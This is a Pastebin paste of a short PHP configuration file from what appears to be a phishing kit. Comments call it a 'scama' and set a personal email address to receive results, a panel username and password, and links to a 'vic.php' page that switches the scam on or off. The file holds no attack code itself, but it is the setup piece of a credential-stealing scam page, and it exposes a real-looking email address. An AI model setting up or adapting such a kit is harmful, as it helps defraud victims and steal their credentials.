ddrmed

klithom kamlin

Nov 23rd, 2018
240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.76 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. // write here your email (medbakh17@gmail.com by default)
  4. $your_email = "medbakh17@gmail.com";
  5. $result      = "medbakh17@gmail.com"; // Set your email
  6.  
  7.  
  8. //write a username (Temo by default)
  9. $name = "medddr";
  10.  
  11.  
  12. //write your scama password (12345 by default)
  13. $password = "0000-0000-0000-2K18";
  14.  
  15.  
  16. //---------------------  Don't touch it !!! --------------------------------
  17. $wrong_password_Error = " Your key is wrong .";
  18. $help = "Check your email <b>( $your_email )</b> , to find your password .";
  19. $permession_Error = "You have no permission to access to this file/page .";
  20. $account_is_on = "vic.php?account=on";
  21. $account_is_off = "vic.php?account=off";
  22. //--------------------------------------------------------------------------
  23. ?>
Add Comment
Please, Sign In to add comment